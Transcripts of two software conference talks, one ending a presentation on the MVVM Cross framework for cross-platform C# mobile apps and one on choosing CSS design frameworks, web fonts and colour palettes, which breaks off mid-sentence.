and they managed to build this iPhone app. And obviously their users were all using iPhones and they wanted them. And now their users are all using Android and they're porting to Android. And also they've ported the same thing to Mac desktop. So exactly the same code using Xamarin.Mac now runs on Mac desktop. We don't have this in the core framework at the moment just because we're waiting for a little bit of PCI support before we make the big effort of putting it across. But this is the future again. When a new platform comes along we can do it. And all of the things like the Sony platforms for example are all C-Sharp which is brilliant. And hopefully as well the Microsoft ones will be if they work it out. So Aviva was one of the, again a version one customer. And they've got this platform that monitors your driving and gives you a score out of ten about how safe you drive. And then we'll give you a discount depending on how safe you've driven. I presume there's an underground current where you try and score zero. I don't know. But again this because it was an insurance app and because insurers don't take any risks at all this needed to be heavily tested. It needed to work across both platforms. It had quite a lot of background code looking at geolocation and things. And so this was again another app. The final app I'll talk about is the Lions app. So this is a rugby tour. I'm not going to make the joke I made in America about rugby because I was worried about Texan shooting me. I'm not going to. I'm not going there. But so this is rugby tour. It's very rich. It's very consumer. It's kind of a magazine thing. But it's also got live stats during games. It had a competition in there. It's on Windows phone. It's on Windows 8. It's on iPhone. It's on iPad. It's on Android. It's on Android tablet. It's also on the Kindle tablets. And this was built in two months by a group of three C-Sharp engineers who didn't know mobile. Yeah, they knew ZAML. They didn't know any of the mobile platforms. And back to front, it's C-Sharp everywhere. So on the server, they use a CMS, which is Umbraco, which talks to SQL Server using entity framework. It's then got this web API front end, which is C-Sharp. It uses a PCL block of entities. Yeah, so all of the JSON objects that go across the web API, those are PCL codes. So it's shared between the server. So that's another one of our platforms, really, and the client. The core logic is also always in a PCL. And all of the UIs are in PCLs. So the SQLite on the local database is also the C-Sharp DRMs. So anywhere in there, any of the engineers can feel comfortable. It's not like, oh, that's the iOS code. I can't touch it. It is all C-Sharp. It's all refactored. It's all got IntelliSense and resharper navigation support. In terms of lines of code, and this is kind of where they, these are their genuine numbers of version one, you'll notice that actually some of the code isn't that shared. Like, there's quite a lot of UI code in the iPhone and iPad, for example. The main reason for that is because they wrote a lot of custom controls, and also they didn't want to use these Zibs, so they wrote everything in C-Sharp there. But what's important is everything they wanted to share in the PCL code they could share. Yeah, just the animations and things like that and the layouts on the individual platforms they didn't share. So that is MVVM Cross, and I'm running about right on schedule. And MVVM Cross is very much still a growing platform. Yeah, V3 is hopefully our final big revision. We have cleaned things up quite a lot. But MVVM Cross is still learning, and the path that we have gone along in the last year, in the last 18 months, is we started with version one, which was really about, you know, everything we do is pretty much driven by real projects. There's no point in making up requirements. We've got plenty of requirements, which are real. But it was really about supporting IE Notify property changed on the three platforms. Version two was the real requirements was to make things more maintainable and to allow us to work in bigger teams. I mean, you know, things like the insurers have very big teams of developers, and was allowed to make really testable code. So that was PCLs in version two. Version three is about cleaning it up, adding.mac. And then the future, and the future is wide open, obviously, but it's pretty darn exciting. And what we're looking at now is we're looking at, you know, as I say, MVVM itself has been fixed almost since 2005, and we're looking at other ideas. What else can we do in our view models? If you look in the JavaScript world, where Angular and where, and where things like Knockout have come along, they've done really exciting things in their view models and their bindings. Some of those things, like the computer observables, can they come back into our world? Can they come back and change things? And to some extent, we're now free of Microsoft and we're free of XAML because we've got our own binding framework. So it's a really exciting time in terms of moving forward. Obviously, async, I haven't shown you much of. I can show you a quick. So there's a guy called John Dix who has produced, do you know what Jabra is? It's a chat room or online using SignalR. And he's produced this Android app as a first demo. And at the moment, this Android app can connect and can talk to all the rooms that allows you to post messages, et cetera. And yesterday, I ported that same code across. And it's not pretty yet, but I ported the same code across just by using XAML bindings. So hopefully, this would connect. And I can join the MVVM cross room and I can type in what's up and be immortalized forever that that has been sent into the thing. Oh, there are some more messages at the bottom. So it's a very much a first UI. I'm not going to ship this one to the store. But you can see that everything is in there. And you can pull about the rooms. And all of these pages, you can pull about the rooms. Maybe you can't. And you can join another room. You can do all that. And this is async await code. This is all our modern C sharp and is the future. So it's very exciting. We also have auto views. We have the idea of some of the UIs could actually be constructed centrally, which is kind of based around dialogue. There's a lot going on around F sharp. I don't know if you've noticed this conference. There are a lot of functional programming sessions and F sharp. FOD is an AOP approach. The ninja ID you've seen, but there's also a plug in ID being built for Xamarin Studio, which is brilliant. We're looking at how we can integrate into designers more. You know, I'm kind of XML based, but I understand designers. As Guy in Holland, who's produced proto pad, which is a bit like a link pad for UIs. It's brilliant. There's more patterns we can do. And I can show you that, for example, this is a guy called Pan Homes in Tenerife, who's produced an F sharp view model and an F sharp view. So there's no reason you can't use our C sharp code in F sharp. And things like that fractal sample, I'd love to see how that really gets much smaller in F sharp. And much more flexible and much more tested. And then there's also, so this is the FOD. And FOD, I don't know if you can see this. Let me show you. So if you use FOD and apologies that it's out of focus doing that, then you don't have to do all of that raise, not property change stuff, because it will inject that for you afterwards. All you do is you decorate your class with implement property change, and then it'll come along and actually automatically generate it. And the amount of effort you have to go to get this working is you have to put that attribute in, and you have to pull in the package from NuGet. So that's it. And the future for things like that is also very exciting with things like the compiler from, you know, the Roslin compiler. So hopefully we've covered some of this today. Sorry if I didn't go into introductions as much as I perhaps suggested I would. And hopefully you've got a good idea about how MVVM and data binding can be applied across all the platforms from this. And that is my hope. It's a new hope. And I hope that if you face a future challenge of any description like we did with Star Wars, then I hope you can keep calm and you can write some code. And I also kind of sneakily hope that you can keep calm and use MVVM across. So thank you very much for listening today. Amazingly, I have four minutes left, which is quite unexpected. So if there are any questions, I can actually answer them, or I can demo some more code or anything else. Anyone got any questions? Oh, there are also stickers. So if anybody likes to decorate their laptops, then by all means come and grab me and grab some stickers. Can I do, sorry? So partial views, you mean kind of user controls? Yeah, so yes, you can do partial views. Oops, that's a bit of Darth Vader coming back. Yes, you can do partial views on every platform. So with iOS, you can have a UI view controller for a specific area and give that its own iNotify property changed object and it will work. Similarly, you can do it on Android using either fragments or using our own control, just called MVX Frame Control. You just give its own data context. You can change that data context and it will change and update automatically. You can use it as a dialogue if you want to. You can use it within tab views. That's the way the tabs work. So yeah, it's exactly as you expect. And you, we do have a navigation model. We allow people to use it on our navigation service. But you can also, if you want to, replace that entirely. And you can just manually set up a view and say, here's your data context and go. So for example, the list view is done on exactly that philosophy. So every cell in that list view has its own kind of data context. And the binding works two way on that as well. So there are several ways of communicating through view models. Like you can actually just give them C sharp references if you want to. There is a messenger plugin which will allow you to use the messenger pattern. And that messenger pattern uses weak references by default. So you don't have to unsubscribe. It just kind of unsubscribes itself when you get garbage collected. Or you can use any other messenger if you want to. So if you want to use something like the great tiny messenger, you can use it. So yes, that's the main way that we set up that type of messaging. And you can also use that messaging back to the UI if you want to or between services. That side of the architecture, I deliberately leave very open for people just because there's so many ways you can build these things. And that's to allow it open. So the way you do that is you would have to do a little bit of code behind. And I don't think I've got a sample available by pre-recorded. But basically on every platform you do have to generally override. There's two methods you have to override. One is where you first register the templates on each platform. And the other is where you choose which template you're going to use for a particular object. But there's a very nice sample, for example, which are kittens and puppies, exactly that on iOS. And also if you're using observable collection, then all of your observable collections, your iNotify collection changed, they work across all platforms. And particularly on iOS, iPhone has, you know, the table view is its heart of iPhone. Every standard control, every standard app in iPhone is a table view, is that list view. And it's wonderful when you actually add an observable collection, you get an animated slide in. It's exactly what you expect for that. When you delete something, you can animate how it fades out, for example. So yeah, that templating again is available. You do have to do a little bit of code to choose which template you're going to use. But it's there. And basically on Android, for example, it would just be another file and then two lines of, you know, switch statement, for example, in C sharp. Okay. Is that it for questions? Okay. So you can all go and have a break now. And this was a picture from Worldwide Developer Congress this week of the breaks. And it's quite funny, but it's also not funny because this is, we need to get some more people in that left thank you. And I don't mean gents move over. So if anyone's got any ideas of developer community, how we get more and more females involved, please tweet it. Please try and work out how we solve this. Because I do some, a little bit of work with young, rewired state. And young, rewired state see 50% females all the time. And some of them are up to 70%. So, you know, we're doing something wrong as a profession. Sorry. A little bit of a political bit at the end. But if you can think of any ways of improving that, I'll go and have a break. Thank you very much, guys.
|
1.4 Million new Android devices are activated every day. 500 Million iOS devices sold. You can target all of them today from your existing C# skills and code. This talk covers: - very brief introductions to Mvvm, Portable Class Libraries, MonoTouch and Mono for Android, - a walkthrough of creating an app using Mvvm and Data-Binding on MonoTouch and Mono for Android, - using native features and functionality through portable plugins, - delighting users with native UIs on all platforms
|
10.5446/51519 (DOI)
|
Good afternoon. Welcome to a developer's guide to design frameworks. If this is not the talk you were looking for, I won't judge if you want to head out. Of course, I would love it if you stayed. Welcome. Come on in. Plenty of seating. Again, developer's guide to design frameworks. My name is Tim G. Thomas. I'm the technical architect at Headspring Mobile. We are a software consultancy based out of Austin, Texas. We have, oh, man, close to 50 people, I think, now. So we're definitely growing. Focus predominantly on web software, but we'll do pretty much anything that our clients need to solve their problems. I can be found on Twitter at Timg. Thomas, and I blog at Timg.Thomas.com. I'm actually currently in the middle of a blog series about redesigning my blog from a usability perspective. And we will probably touch on some design frameworks in that blog series. So if you're interested, feel free to subscribe or follow me on Twitter so I can get my Twitter follower count up. Let's talk about design frameworks. Hopefully that's why all of you are here. This phrase means a lot of different things. So I want to start by defining what exactly a design framework is. Especially in the software, the code realm, there's a lot of arguments about frameworks versus libraries versus components and all these other things. But for the purposes of this talk, a design framework provides some CSS, some expectations on what your HTML will look like, and on, in some of the cases, some JavaScript to put in some behavior, to have some common attributes, get started quickly. Many of the ones that we will be discussing today also have responsive components, meaning that they respond to different sizes of screens. So they look fairly decent on desktop computers, tablet devices, phone devices, who knows what else, refrigerators. Now, apparently some of those have web browsers in them. So presumably some of these frameworks will respond to those screens as well. Ultimately, the goal is to not have to force developers to touch the CSS type stuff. CSS is confusing. I've been working with it for a very long time, and we have a very love-hate relationship. There are many things that I love about it, and there are many browsers that I hate. And so these design frameworks have a goal of fixing a lot of this stuff. So we'll talk about specifically what some of these things do. Again, they definitely help with rapid prototyping, whether you are planning to turn that prototype into an actual application or not. One of the things that we do commonly at Headspring is do prototyping that we have absolutely no intention of turning into production code to vet out ideas and make sure that we're not going down a completely wrong path. And we use some design frameworks to help with that. I mentioned that these sometimes preclude the necessity of dealing with CSS at a detailed level. But honestly, if you're using one, it's good to become familiar with CSS. Eventually, you'll need to do some tweaking beyond what any of these provide for you. And so a lot of these provide you the ability to become a little bit more familiar with your CSS stuff. And in some cases, maybe, there's huge asterisk that should be on that last point. Maybe they will actually turn into a final user interface for you. But we'll discuss why that's potentially not such a great idea a little bit later. So you would want to use one over maybe rolling your own stuff. We've already discussed prototyping. So if you're trying to do something like that, if you're writing a project for you and as developers, I think a lot of us do that, sometimes they end up becoming very public projects that everybody uses. But many of them start as things for just you. So if you're using just building an app for yourself, these design frameworks can definitely help with that. And in some of the cases, as we'll see today, you can actually build on these and put some additional styling on them. So they'll provide sort of a normalized baseline scaffolding foundation, whatever you want to call it, upon which you can add additional CSS styles and build up the visual style of your application. The question that I'm always asked at this point is, do I still need a UI designer? And I have some bad news. Yes, you really do. It's really difficult to get by in the long term without one. But as I mentioned, some of these personal projects just for you probably don't need one. But the second you start interacting with users, probably would help to actually get a legitimate UI designer. By that, I don't mean you guys are not legitimate UI designers, but someone who may do that for a living. That's all they do is work in CSS and HTML and maybe some JavaScript to make things look good, usable, all that other good stuff. But again, it's a good place to start here. You can begin here, maybe hand it off to a designer. Maybe you get so excited about working with this stuff that you want to become a designer yourself. And so you learn CSS and HTML, and then you can build on top of these things. But regardless, these are a good place to get started on almost any type of project. So I have some more bad news. And that bad news is, if you were coming here hoping that I was going to say, use this framework and no others, that's not going to happen. I do not have one go-to framework. I don't recommend that anybody have one go-to framework. This means that none of the frameworks that are on this presentation have paid me to be here, much that I wish that wasn't the case. They didn't, and I will not be telling you, you need to use this one. What I do hope to do is educate you on the options that are available, talk about the strengths and weaknesses of several categories of these design frameworks, and when they work well and when they don't work well, so that when you're encountering a circumstance where you think, maybe I could use a design framework, you're better equipped to determine which one would be good for you. On the other hand, I'm not going to do this. And this is actually a search result that I found. I just did a search for a jQuery light box plug-ins, which are those things that pop up on photo gallery sites and show you bigger pictures than were on the screen. I hate these because what they come down to is here's 50 options, here's their URLs, here's something interesting about them. Go pick one. And there's no additional information other than here's 50 of them. I don't want to do that either. So with that in mind, I'm not going to be providing a large number of examples. We'll be categorizing each of the major ones, and some of which you may not have heard of. And then using those as sort of blueprints for figuring out what some of the other options are, so that then you can go through and search for, I need a particular type of design framework and come across search results like 50 plus design frameworks you should try. But that's not me. That's for later. That's for your Google searches. Right now, I'm just going to be categorizing them and again trying to help educate you guys. Before I get too far in, I want to take a few moments and talk about well-formed HTML. How many of you touch HTML on a near daily basis? Show of hands. Most everybody? That's great. Awesome. That's actually exactly what I was hoping for. Of those, you don't have to necessarily raise your hand, but just like nod or something. Do you understand HTML? Do you really get it? Can you figure out when to use certain tags more or less? Okay. There's a good reason for this. There are a number of other reasons. The project I just left at my job had a large component that had to be accessed by people with disabilities and use of proper HTML tags definitely helps with a lot of that. But there are some other reasons that are specific to working with design frameworks. For one, it's very easy to apply a lot of these frameworks on top of your existing HTML if you follow some conventional rules. Not always. We'll talk about some exceptions today. But if you follow the generally accepted practices for building HTML, it will be relatively easy to apply a lot of these design frameworks. It helps with consistent styling. If you have a plan, if you know that I'm going to be representing a text box with a label next to it, so I'm going to use the paragraph tag and then the label tag and then the input tag. If you consistently use the same sorts of HTML groups, then you'll have a more consistent styling in your user interface. This goes beyond design frameworks. This is just if you do that, you will have a more consistent UI. It doesn't matter whether you're using a design framework or not. And finally, it simply lowers maintenance time and costs. Divitis is a pretty big issue that we're encountering a lot these days. And that's an overabundance of Div tags. Certain websites, I think IBM's website is really bad about this. They also, I think, use tables, by the way, for layout, also no, no. But it's confusing to use. A new developer coming in has to sift through all of these Div tags, especially if they're using one of the Dev tools that one of the browsers provides, to try to figure out where they need to start implementing this new feature or this new design or something. And so clean, well-formed HTML helps quite a bit with that. If you need some help on this, on this front, there's an excellent site by the What Working Group, which has been responsible for a lot of the interesting conversations going around HTML5. They have a site developers.whatwg.org. And there's some sections there that discuss specifically HTML tags, even existing ones before HTML5, when to use them, how they can best be integrated with other tags and so forth. So worth checking out if you haven't already. So while we're evaluating these different design frameworks today, we'll be scoring them on four important metrics, utility efficiency, education, and extensibility. And I want to take a brief moment to describe what I mean exactly by each of these. Utility is how close a framework is to the end-all, be-all, do absolutely everything for you. So a framework with a high utility score has all of the CSS that you will ever need, all of the JavaScript that you will ever need to build a final-looking UI. Efficiency is how long does it take to start being really productive with it? Do you have to read a lot of documentation, or can you just simply jump in and start using it? Education is how easy is it to learn from this framework? Are you learning about good CSS, or are you just learning the framework? And the finally extensibility is I have created this page with this design framework, and I'm handing it off to a designer. How likely is it that that designer will want to come kill me later? That's a good indication of how extensible that is. And there's a couple of different sides of that particular coin that we'll talk about, too. So there are four categories that we'll be discussing today of these design frameworks. And in no particular order, except for the order that I'll be presenting them in, there's the specific comprehensive selective and then a special Aalik Hart version that we'll talk about. So to begin with, let's look at specific design frameworks. Specific design frameworks are designed to provide solutions to the problems that 99% of your web apps are going to have. So things like, I need a grid system. I need to lay out things with a grid. I need that almost all the time. I need the ability to lay out different form elements all the time. I need my headers to be consistent sizes regardless of their hierarchy. Almost all the time. These are not going to be specialized at all. They're going to provide global options that will probably be applicable to almost all of the applications that you try to build on the web. And what that also means is that more than likely you will have to then come back around and follow in with your own conventions. So these do take a little bit of additional upfront knowledge of CSS to make a lot of these work. These are, however, very good for rapid prototyping because we don't want these prototypes to be very high fidelity. We don't want perfect typography and excellently chosen colors. We want things to be a little bit rough. Wireframes want to be ugly is a quote that I heard recently. And I completely agree with it. You don't want anything really pretty on it. So there's no reason to go beyond these very basic types of design frameworks. They also, believe it or not, work very well for long lived apps, apps that are going to be out there in the market for more than a year. Your definition of long lived may vary, but a long enough time. And the reason is they won't stand alone that way. Of course, you actually need the additional CSS to make these work for your specific circumstances. But they tend to be so lightweight that it's just not an issue to have them in your app. And in fact, the one that we're going to look at next is, I think, probably accidentally included longer than it needs to be because it's so lightweight, nobody bothers actually going through and removing it later. A point to note about rapid prototyping, though, is I would use these when I know that the code that I'm writing for this prototype will be used in production. It's a separate one that I normally use when I know it's completely throw away. But if I'm relatively certain that this prototype that I'm building or the team is building is going to be used in production, then I'll use one of these. Have you heard of skeleton? Anybody? Just a couple? Okay. I'll actually, I have a web browser up with all of these guys. So let me bring that over. I'll go away. Okay. And nope, that's the wrong one. Just a moment. Sorry about that. Here we go. All right. So this is skeleton. Skeleton is, I won't read it to you, but it's that thing. It is one of those very specific types of design frameworks. It provides a few things, provides a nice grid, and I can resize my browser. Let me get rid of this one. All right. I can resize my browser and you can see the grid is going to change size. So it has that responsive component to it. So that's nice. That's there. It has some basic typography to it. So these are the actual styles that your headings will have next to it. It has some basic buttons, some forms with input boxes, drop downs, radio buttons, check boxes. Discusses some of the media queries that make the form stuff happen, but that's actually it. Like this is it. This is your, this is skeleton right here. There's not very much to it. It really is lightweight. And that's nice for a few reasons. Okay. But first, unfortunately, skeleton really fails on the utility front. You can't build a production app with just skeleton. There's no behavior there. There's no actual visual style there. I guess technically you could, but it would be very, very boring and nobody would want to use it because everything is just gray and bland. So you can't just jump right into a production app while working with skeleton. However, it's very, very, very easy to get started. The reason is skeleton styles base tags. So it's going to style all of your H1s with a style. You don't have to add CSS classes. You don't have to tell it specifically, I want to use skeleton for this. It's going to hijack most of your user agent styles that have defaults for headers and so forth and style those. As a result of it not really covering every circumstance that you'll need and you need to add some additional stuff on top of it, there is some education opportunities there. So you're going to have to learn some CSS by looking at the skeleton code. You'll actually learn quite a bit of CSS as well. It's relatively clean, well organized, easy to understand and well documented as well. And then it's sort of designed to be extensible. It's the whole point of its existence. I don't think the creator had any intentions that skeleton would be used for final user interfaces. The whole idea was release it, get it out there, let people build upon it to create their user interfaces. This type of category is often very light on the options. So you're not going to have a ton of different variations on this theme. Some might do some additional styling for drop down lists. Others might add some table layout type stuff. Not table layouts, table styling. Don't do table layouts. I could have missed that earlier. But they're all mostly relatively lightweight. Not going to do anything crazy for you. On the other end of the spectrum however are the comprehensive ones. They're very, very behemothal. I mean they're huge, gargantuan. Do everything for you. No seriously, they do absolutely everything for you. The whole goal of these particular frameworks is to do everything for you. You don't need a designer. You don't need anything else. You just need to use this one framework and everything will be fine and happy, rainbows and unicorns and all that other good stuff. These are good for rapid prototyping only if you never, ever, ever plan to release your code into production. The reason is this paints you into a corner where it's very difficult for you to extend on top of it. This is the framework type category that I normally recommend for building those personal tools just for yourselves. Because you probably don't need to go through a lot of extra effort to make a pleasing visual design for yourself if you're the only user. If you're going to release it to other people maybe look at revaluating and using one of the others. But if it's just a tool for yourself, go right ahead. Would anyone like to take a guess as to what framework type I might be referring to here? That's absolutely right, Twitter bootstrap. I don't mean to rag on it specifically. It is a perfectly valid category. It's why I included it here. But it's very important to be aware of its strengths and limitations. And unfortunately it does have quite a few limitations. It does everything for you. I can't stress that enough. It includes JavaScript plugins for auto-completion and throwing up light boxes, some of those 50 plus light box plugins. I don't think you need those if you use bootstrap. There are some themes for it that you can download. There are also people that seem to be professional theme makers for bootstrap which might be kind of a red flag anyway. They're not very efficient. You can get started with it fairly quickly but if you want to build a complete site with it you have to read through a lot of documentation to figure out all the different ways that you can use the different components of it. So it scores relatively low in efficiency. You certainly learn a lot with it but you don't learn CSS. You learn bootstrap with it. And so I can't give it any high marks for education because you end up not really learning very much about CSS because it does so much. There's so many lines of CSS it's impossible to tell exactly what's going on where. So not very good for learning things. And again it's not very extensible unless you're one of those professional designers of the bootstrap themes. If anyone here is that, great. I hope there's money in it. It certainly seems like there is. Just like the WordPress theme thing. But I've had the unfortunate job of trying to extend Twitter Bootstrap on two or three occasions and ultimately just recommended they get rid of the whole thing. The third major category is selective. It's kind of in the middle of both of those. It's sort of a good middle of the road option. It's not too opinionated one way or the other. Most importantly they're deliberately incomplete. So skeleton was also deliberately incomplete but it was so deliberately incomplete that you almost have to do too much work to get it to apply. These types of things are, like I said, kind of in the middle. They provide a lot for you. They don't provide everything for you. You will still have to learn some CSS. You'll still have to extend them. But they're great for a lot of circumstances. In fact, we most of the time start with one of the members of this particular category. That's going to be changing but we'll talk about that in the Aulacart section. One of the better known examples of this is Zerb Foundation. And I actually have to call myself on a lie a little bit on this slide because the recent versions have definitely shifted it more in the comprehensive category. They're trying to compete a little bit more with Twitter Bootstrap. But the reason it's still valid is you can download the earlier versions which are absolutely right in the middle. They didn't provide a lot of the additional styling and icons and so many other things that Twitter Bootstrap provides but it certainly was a lot more than something like Skeleton. Definitely right in the middle. And the scores kind of show it. It's relatively useful. You can probably build a short lived application on it with very few issues. And not have to worry about a lot of additional styling after that. It's relatively easy to get started with. It includes some base styles based on bare tags so you don't have to apply a lot of CSS classes. There are some CSS classes there so you'll need to read through a few pages of documentation to become really familiar with it. You'll learn quite a bit about CSS. This one again is more toward the prior versions when things were a little bit more generically mentioned. Right now they have so many exceptions to the rules that it's very difficult to really understand the complete picture of one particular group of CSS rules. That's relatively extensible. The new version which I believe is either four or five. I think four was the one I tried to extend most recently. It's kind of a pain but version three was still okay so if you're interested in swapping back to 3.0 these scores definitely apply. And then finally we have the a la carte version. And this is where I think a lot of design frameworks are going to end up moving toward. And the reason is this provides a lot of the benefits of all of the other versions. Predominantly because they're completely modular. And so you can pick and choose all of the individual components that you want to download and use in your application. And they're designed that way. There's no expectation that you will download absolutely everything. JQuery is also moving toward this version in the 2.0. You can download specific parts of JQuery. Maybe it's getting a little bit heavy in the file size and so this allows you to pick and choose exactly what you're looking at. There's a new framework that was released just a couple of weeks ago I believe called Pure CSS. I'd like to bring that up on the screen for you guys in a moment. But it solves that problem. It's definitely modular. There's a lot of different parts to it. You can download just the ones that you might be interested in and leave the rest alone. So let me bring up my web browser. The right one. There we go. And here is Pure. So very pretty web page. Definitely going on the flat design trend that they've got here. But you can see from the very beginning they're serious about this. They have all of their different groups categorized and sized up for you. So you can say, I just want tables. And here's how you style your tables. You can see this is one of the examples that most of this stuff is bare tag so you don't need to apply a lot of CSS styles to it. You style the entire table with one of their attributes. But you can download the whole thing for what is that, 0.6 kilobytes. Not very much. So if all you're doing is just working with tables, just download that one a little bit. Or if you care too, you can download the entire thing and use all of it in your application as well. But I think we're going to see a lot of frameworks end up hitting this particular sweet spot. Because think about it. Bootstrap has all these components. If they're able to separate those out and say, you know, all I care about is the buttons. All I care about is the navigation. Let me just download this one small part. It's a heck of a lot lighter weight. Probably still just as difficult to extend. So I don't think it's going to solve all of the problems. But it will at least preclude you from having to use Bootstrap everywhere in your site. And for those of you that have used Bootstrap before, sorry, but you can kind of tell a Bootstrap site from a very long distance. Even the ones that have skins on them, you can sort of just glance at them and say, oh, that's a Bootstrap site. There actually is one that I'll show after the talk if anyone's interested. But someone attempted to recreate early 1990s GeoCities with a Bootstrap theme. So it had the little construction animated GIF or GIF guy. Rainbow is all over the place, sparkling backgrounds. It's quite a thing to see. For the sake of everyone's eyes in the audience, I won't bring it up right now on this huge thing. But if someone wants to see it on my smaller screen, I'd be happy to show that to you guys. All right. So these Alucard frameworks have a lot going for them. They can do everything for you. Because they're Alucard, you can mix and match. Most of the ones that I've looked at do a fairly decent job of not clobbering everybody else's design framework prefixes and stuff, predominantly because they use these prefixes. So Pure uses Pure. Others will use a little CSS prefix of their own. And so you don't get a lot of the Bear styles conflicting with each other. So if somebody prefers Helvetica and somebody else prefers Georgia, they're sort of clashing. They're also, again, can be very efficient to get started with. You saw the Pure just required one or two CSS classes and then our table was just fine after that because it used the rest of the Bear tags within that. Education really does vary. It just depends. Some of these modular frameworks do a really good job of not having to make you touch any CSS whatsoever. Others do very little for you and you have to learn about the box model and border sizing and all these other interesting concepts. By and large, it seems fairly nice, but it's enough of a variation that I hesitate to actually put a score on it. And then, of course, these things are, again, designed for extensibility. So you just include the tables module for your.6 kilobytes and then you can design everything else however you'd like to and not have to worry about those specific tables. So all of this kind of fits neatly on a little spectrum diagram, if you will, that all comes down to how important is your user interface? So is it unnecessary? It's not to say that it's a headless application. It's just to say that, again, if you're building a site for yourself and you're the only user, you don't need a really fantastic user interface. If you're building a site for millions of customers, it probably helps to have a pretty decent UI. So you can kind of lay the different categories out like this. If you need something that's very, very extensible that you can customize to really fit your needs, go with one of the specific options. On the other hand, just building something for yourself, give one of the comprehensive ones a try. If you need something in the middle, go right ahead. And what I've found is this actually lines up fairly well to the types of users that you have. If these users tend to be internal users, excuse me, meaning yourself or someone else, a small group of people within your organization, some of these comprehensive frameworks actually end up working very well. On the other hand, if you're doing a lot of public-facing stuff or business-to-consumer type of work, you really need a lot more of a UI that's very differentiated from anything else that's out there. So something like Bootstrap wouldn't work. Probably go with something like Skeleton and then have someone, potentially, yourself actually go in there and make a really nice UI that's very customized to your specific needs. Most of Head Springs work actually falls in this middle section here in the business-to-business type of realm. And so that's why we end up using some of these more selective frameworks that's neither end of the particular spectrum. And it works out well for our cases, but it all depends on the type of users that you guys will be working with. Any questions so far? All right, great. And they gave me an excuse to have some more water. So let's go beyond that. I've already talked about frameworks. Where do we go from there? So we've picked a framework, want to make it a little bit more extensible, assuming that the framework you picked didn't already do all of these things for you. So we're sort of operating under the assumption that you didn't pick Bootstrap at this point because if you did, there's not much else to do except try to learn it as best you can. But if you did pick one that needs a little bit more extensibility, let's talk about some of the ways that you can actually make that happen. And the first is with web fonts. This used to be our group of fonts right here. There were a few others. If you were a Mac user, you had Helvetica instead of Arial. There's Trebuchet, MS, which is the coolest name typeface ever. And then Comic Sans, which everybody hates. And really, I used it on the slide so I could tell people that I legitimately used Comic Sans on a slide, really just to make fun of it really. But this used to be almost all of our selection. We didn't have a ton of other options. So if you wanted your site to look different, unfortunately, most people chose Comic Sans at that point, which is also included in the Twitter Bootstrap theme for GeoCities. We don't have that potential problem anymore. Ironically, it's thanks to a lot of work from the Internet Explorer team. I see ironically, because they're not exactly known for being very web dev friendly, but IE actually developed one of the standards for transmitting typefaces across the Internet. So we now have the ability to put custom type on our web pages. Two of the sites that I recommend people use are Google Web Fonts, which I think is responsible for a lot of the upsurge in using these web fonts. And a Typekit. Google Web Fonts is free. You can use it on any sites anywhere. You serve fonts directly from Google or rather Google serves fonts to your app. And then just move on from there. Typekit is much the same, but it has a little bit of cost associated with it. If any of you are also sort of the designer group and have Adobe Creative Cloud subscription, Typekit is included with that. If you don't, it's a relatively affordable way to get all of Adobe's products that are normally ridiculously expensive for not a lot of money comparatively. And Typekit is included. So with that, I want to take a couple of moments and just sort of walk through some basic features of Typekit, which I think are pretty helpful for this. So that's the wrong one again. There we go. Okay. So, and this comes up. There we go. This is Typekit. You can see by default it's showing me a few typefaces already, but this is the part that's really interesting to me over here. This allows me to characterize and filter down all of the typefaces that they have available. And they have a lot, many, many thousands of these typefaces that are available. So I can specify the type of feeling I want for my site. I'm writing a literature site, so I'm going to want something with some serifs perhaps. Probably not black litter, but let's go ahead and check out some of those as well. So there are all these different options here. I can choose instead, we're making a modern site. So I'll do some sand serif. Let's make the thickness about equal, which is very modern sort of geometric looking typeface. And we have some very interesting options here. Freight Sands is actually one of my favorite typefaces. So let's go with that one. I can click it here and see a lot of different examples of what it's going to look like on this particular web browser. Really cool things. I can come to this tab. Here we go. This tab. And actually see what these look like on different browsers and OSs. So I don't have Windows open, so I can see what it looks like on Windows 7. I can go to Opera or anything like that. If we want to check out Windows XP, we can. But that doesn't always look very good. It's kind of hard to see down here. It doesn't look very good up there either. But you have all these options that Typekit gives you while you're actually searching for some of these typefaces. And then when you're ready, you simply add it to what they call a kit. And then you reference that kit in your HTML. And there you go. You have a custom typeface in your application. There's some potential gotchas with these. Most notably that this is still an HTTP resource. It has to be requested from a server that's not your server. So additional point of failure potentially. I believe mobile Safari will not display any fallback fonts. So if you say give me Freight Sans Pro and then give me Helvetica if it doesn't find it, it won't display anything until it downloads the typeface. There's some ways to get around this, but some things to be aware of. But even if you do nothing to even something like a bootstrap site, except swap out the typeface for something a little bit different, it's already going to look considerably better than if you use the regular Helvetica, the regular types of typefaces and so forth that it has included. If you're interested in finding what typefaces work well together, this is a site that I use quite often. There's the URL there. It just shows you a number of different examples of places that have two different types of typefaces. Very common. We'll have a certain typeface for headings. So if they stand out, normally it's very bold. Sometimes that's Serif and then the actual content of your page is in Sans Serif. This site has a lot of that information definitely worth checking out. However, there's one thing to be aware of. There's a site called Font Squirrel, and I don't mean to pick on Font Squirrel specifically because there are a lot of other sites that do this. Ultimately, the behavior is you pick a true type font or some other type of font that you have on your computer. You upload it to Font Squirrel or some of these other sites, and they give you all of the web fonts you need. It seems great. You just toss those in your web server. You can serve up these fonts from your server. They will show up in your devices, and that was really easy. Unfortunately, almost every single one of the licenses on typefaces available today precludes you from being able to legally do that. You have to use a font that's specifically designed to be served on the web. Google Web Fonts does this. Make sure that they have the right typefaces. Typekit does this. Fonts.com has another subscription model where you can use the web fonts. All of those sites do this, but do be aware of the ones that say all you have to do is upload your font. And don't want any lawsuits impeding your ability to release software to your clients, trust me. Also it's just nice if you really enjoy a typeface. Some of the font foundries, the creators of some of those typefaces will allow you to purchase licenses as well. Check that out. That also has the benefit of supporting these guys that actually are building these fonts. Colors are another interesting thing. I love taking an otherwise bland website and just adding a bunch of splashes of color on it just to see what happens. Let's talk about colors for a bit. They're generally used to convey information. In the last talk I discussed some ways of preventing people from doing things erroneous or potentially destructive operations. We looked at the fact that buttons that are red tend to do that very well. People sort of have a psychology when they see something red. They need to pause for a moment and say, this could really be a bad thing. Unless your company's colors are red and that might not be good either for a number of different reasons. Which brings me to the second point. If you are working for a public website for your company, they may already have colors. They may already have logos. But if they don't, in general, cooler colors tend to be a little more positively received. So blues and greens and that sort of thing. Warmer colors with reds and oranges and so forth are maybe a little bit more negative. A lot of this is cultural. You go to a different part of the world and these things are completely different. But by and large it's kind of how this sort of thing works. So again, if you've got a company colors or something like that, go ahead and use those. If you don't, check out this site. I love it. It's awesome. I don't want to bring it up right now, but you can go to it on your mobile devices or what have you. People upload photographs and then they convert those photographs into color palettes. Amazingly balanced 